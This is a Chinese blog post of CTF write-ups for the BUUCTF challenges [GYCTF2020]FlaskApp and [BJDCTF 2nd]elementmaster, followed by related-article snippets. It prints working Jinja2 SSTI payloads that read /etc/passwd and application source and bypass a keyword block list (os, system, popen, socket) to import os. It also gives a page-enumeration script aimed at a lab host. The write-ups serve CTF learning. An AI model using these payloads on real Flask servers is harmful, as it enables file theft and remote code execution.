8-13刷题

最新推荐文章于 2025-03-07 16:38:08 发布
原创 最新推荐文章于 2025-03-07 16:38:08 发布 · 566 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

[GYCTF2020]FlaskApp

加密没问题,解密的时候随便输入字母

 报错了,输入e3syKzN9fQ==//{{2+3}},返回5说明存在ssti注入,python3的ssti先试一下读文件

{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}}
e3soKS5fX2NsYXNzX18uX19iYXNlc19fWzBdLl9fc3ViY2xhc3Nlc19fKClbNzVdLl9faW5pdF9fLl9fZ2xvYmFsc19fLl9fYnVpbHRpbnNfX1snb3BlbiddKCcvZXRjL3Bhc3N3ZCcpLnJlYWQoKX19

 把app.py读下来

{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('app.py').read()}}
 from flask import Flask,render_template_string 
 from flask import render_template,request,flash,redirect,url_for 
 from flask_wtf import FlaskForm from wtforms import StringField, SubmitField 
 from wtforms.validators import DataRequired 
 from flask_bootstrap import Bootstrap 
 import base64 
 app = Flask(__name__) 
 app.config['SECRET_KEY'] = 's_e_c_r_e_t_k_e_y' 
 bootstrap = Bootstrap(app) 
 class NameForm(FlaskForm): 
	text = StringField('BASE64加密',validators= [DataRequired()]) 
	submit = SubmitField('提交') 
class NameForm1(FlaskForm): 
	text = StringField('BASE64解密',validators= [DataRequired()]) 
	submit = SubmitField('提交') 
def waf(str): 
	black_list = ["flag","os","system","popen","import","eval","chr","request", "subprocess","commands","socket","hex","base64","*","?"] 
	for x in black_list : 
		if x in str.lower() : 
			return 1 
@app.route('/hint',methods=['GET']) 
def hint(): 
	txt = "失败乃成功之母!!" 
	return render_template("hint.html",txt = txt) 
@app.route('/',methods=['POST','GET']) 
	def encode(): 
		if request.values.get('text') : 
			text = request.values.get("text") 
			text_decode = base64.b64encode(text.encode()) 
			tmp = "结果 :{0}".format(str(text_decode.decode())) 
			res = render_template_string(tmp) flash(tmp) 
			return redirect(url_for('encode')) 
		else : 
			text = "" 
			form = NameForm(text) 
			return render_template("index.html",form = form ,method = "加密" ,img = "flask.png") 
@app.route('/decode',methods=['POST','GET']) 
def decode(): 
	if request.values.get('text') : 
		text = request.values.get("text") 
		text_decode = base64.b64decode(text.encode()) 
		tmp = "结果 : {0}".format(text_decode.decode()) 
	if waf(tmp) : 
		flash("no no no !!") 
		return redirect(url_for('decode')) 
		res = render_template_string(tmp) 
		flash( res ) 
		return redirect(url_for('decode')) 
	else : 
		text = "" 
		form = NameForm1(text) 
		return render_template("index.html",form = form, method = "解密" , img = "flask1.png") 
@app.route('/<name>',methods=['GET']) 
def not_found(name): 
    return render_template("404.html",name = name) 

if __name__ == '__main__': 
    app.run(host="0.0.0.0", port=5000, debug=True)

过滤了flag及一众命令执行函数,我们用命令拼接的方式

{{''.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}

发现有个this_is_the_flag.txt,读一下

{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/this_is_the_fla'+'g.txt').read()}}

[BJDCTF 2nd]elementmaster

 506f2e706870hex解码之后是Po.php打开发现个点,结合元素大师猜测枚举所有元素,上脚本

#-*- coding:utf-8 -*-
#__author__: ta3shi
import time as t
import requests

url='http://28e31583-c191-4a0b-8d65-2deaf1c3bc54.node3.buuoj.cn/'
result=''
element=['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar',
        'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br',
        'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Te', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te',
        'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm',
        'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn',
        'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm','Md', 'No', 'Lr',
        'Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og', 'Uue']

for i in element:
        t.sleep(0.5)
        r=requests.get(url+i+'.php')
        if r.status_code == 200:
                result+=r.text
                print (result)

打开即可得到flag

 

CSP-J记录文档
lailaike08的博客
10-22 540
CSP-J文章
c语言---01
weixin_51912875的博客
01-17 1726
目录 1.static 2.根据公式计算m的值 3. 输入5个学生各5科成绩,输出5个学生各5科成绩及总分。 4.最大公约数 5.闰年 6.素数 7.计算1/1-1/2+1/3-1/4+1/5 …… + 1/99 - 1/100 的值 8.求10个整数中最大值 9.输出9*9乘法口诀表 10.能把arr1中的abcdef拷贝到arr2中 11.调用memset()函数 12.写一个函数可以找出两个整数中的最大值 13.写一个函数可以交换两个整形变量的内容 14.通过指针位置来修改
[GYCTF2020]FlaskApp
Sk1y的博客
06-10 2430
知识点:flask框架开启debug模式产生的漏洞,PIN码的产生过程和文件读取,字符串拼接绕过,倒序绕过过滤。
BUUCTF-[GYCTF2020]FlaskApp flask爆破pin
m0_64180167的博客
12-07 1192
这道不需要爆破也可以getshellssti都给你了但是学习记录一下pin的获取首先就是通过base加密后 当base64解密的时候 会造成ssfr这里过滤了 * 所以使用 {{7+7}} 实现然后我们开始看看源代码可以发现HINT 下存在pin所以是找pin这里我们开始在解密随便输入内容报错了 然后我们可以看源代码这里可以发现没啥内容 但是有waf首先通过读取读取一下/etc/passwd。
BUU41 [GYCTF2020]FlaskApp1【SSTI】
2401_86190146的博客
02-25 1096
目:加密处没啥事,但是解密的地方提交{{7*7}}就会返回报错界面,顺便把代码也爆出来了先将字符串 text编码为字节对象,然后使用函数对这个字节对象进行 Base64 解码操作,报错的原因也就是解码没成功,将{{7*7}}进行base64编码后输入可能是过滤了{{ }} 把 {{ }} 去了还是nonono试试7+7,成功。。?具体流程:1.套模板,发现被过滤了字符,查看源代码2.列目录。
BUUCTF——[GYCTF2020]FlaskApp1 SSTI模板注入/PIN学习
最新发布
2401_88083440的博客
03-07 1499
尝试读取这个文件,但这里因为有flag黑名单,需要进行一些绕过,尝试用python列表的特性,使字符串倒过来(this_is_the_flag)(或者直接构造'this_is_the_fl'+'ag.txt'应该也行)linux的id一般存放在/etc/machine-id 或 /proc/sys/kernel/random/boot_i 中。得到:/usr/local/lib/python3.7/site-packages/flask/app.py。获取基类,tuple类的基类是object类。
c语言---02
weixin_51912875的博客
02-09 1265
1.输入数字n,按顺序打印出从 1 到最大的 n 位十进制数 比如输入 3,则打印出 1、2、3 一直到最大的 3 位数 999 int* printNumbers(int n, int* returnSize ) { *returnSize = pow(10, n) - 1; //确定最大的数字 int *arr = (int *)malloc(sizeof(int)*(*returnSize)); //申请足够大小的空间 for (int i = 0; i &l.
蓝桥杯---(2)
远赴人间惊鸿客的博客
10-13 763
蓝桥杯---(2) 门牌制作 单词分析
178-C语言18
weixin_45964837的博客
01-28 918
1.C语言中的文件的存储方式可以顺序存取,也可随机存取 2.若有 int i=10,j=0; 则执行完语句,i的值为11,说法是否正确? if (j = 0) i++; else i--; 答案:错误 if(j = 0)相当于if(0),执行else的i–,结果为9 3.下面程序运行的结果是什么? int a = 2; int b; printf("%d\n",b = 2 && (-1)); 答案:1 &&两边只要都没有0就是1 4.用到volatile关键字修饰
[GYCTF2020]FlaskApp(SSTI)
qq_45521281的博客
06-09 3132
进入目: 是一个用flask写的一个base64加解密应用。有一个加密页面和解密页面,思路应该是在加密页面输入payload进行加密,加密结果在解密页面进行解密,输出解密后的payload被渲染到页面输出后执行了payload。 官方write up说看到根据hint1,失败乃成功之母,应该能想到flask的debug模式。但是我当时看到的时候并没有想到是debug模式,这就是没有进行足够积累的后果。 base64decode在不会解析的时候就会报错,然后习惯性对base64解密页面进行报错实验,ba
GYCTF2020_Writeup
Lethe's Blog
03-15 2754
Blacklist 一到注入,和2019强网杯的随便住基本一致,但是多过滤了set、prepare、alter、rename: return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); 获取表名和列名的方式与原一致,而获取数据可以参考这篇文章:http...
Flask debug模式算pin码
遇事不决冲冲冲
03-21 5846
## 什么是PIN码 pin码也就是flask在开启debug模式下,进行代码调试模式的进入密码,需要正确的PIN码才能进入调试模式 ## 如何生成 这里就列一个了,前面全是获取值,最后进行加密,版本不同区别也就就是3.6与3.8的MD5加密和sha1加密不同
ssti详解与例以及绕过payload大全
热门推荐
HoAd'blog
02-10 1万+
ssti详解与例以及绕过payload大全 [BJDCTF2020]Cookie is so stable user=1231{{2*4}} 判断是不是ssti user={{system('ls')}} 执行命令,但不能成功,,好像是空格不可以 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 这是最后的payload https://0day.work/jinja2
BUUCTF__web解合集(九)
风过江南乱的博客
09-23 1226
1、[GYCTF2020]FlaskApp 2、[NPUCTF2020]ReadlezPHP 3、[MRCTF2020]Ezpop 4、[极客大挑战 2019]RCE ME 5、[CISCN2019 总决赛 Day2 Web1]Easyweb、
模板注入总结(SSTI)
qq_44657899的博客
02-14 5766
a. 获取变量[]所属的类名 {{[].__class__}} b. 获取list所继承的基类名 {{[].__class__.__base__}} c. 获取所有继承自object的类 {{[].__class__.__base__.__subclasses__()}} 没有内置的os模块的类 目录查询 {{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("
python安全之学习笔记(一)
郁离歌丶的博客
09-29 4314
暑假想深入学习下pythonweb的,结果被一堆事缠着,只能勉勉强强看了下ssti模板注入的一些东西。真的是菜的糟心,暑假又是一事无成。 0X00.浅谈关于python引发的安全问 pythonweb的话代码方面的问最多的可能就是SSTI模板注入、沙盒逃逸及反序列化,一般来说,使用django的模板渲染能够抵御很多的xss攻击,sql注入现在确实已经很少了,orm框架的使用,导致sql注入...
uC/OS-III的OSTaskStkInit函数中的Align the stack to 8-bytes
AsCoolCucmber的博客
12-15 668
最近在学习uC/OS-III,刚好看到官方源码中的OSTaskStkInit函数中有这么一句让我百思不得其解。 /* Align the stack to 8-bytes. */ p_stk = (CPU_STK *)((CPU_STK)(p_stk) & 0xFFFFFFF8); 然后我开始看CSDN其他博主的文章,然后我竟然开...
掌握PostgreSQL基础-国外程序员的课程
资源摘要信息:"国外程序员-lesson-w10d04-postgresql:课程-w10d04-postgresql" 知识点: 1. PostgreSQL介绍: PostgreSQL是一个先进的关系型数据库管理系统(RDBMS),它使用SQL作为数据库的查询语言。它是一个开源...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值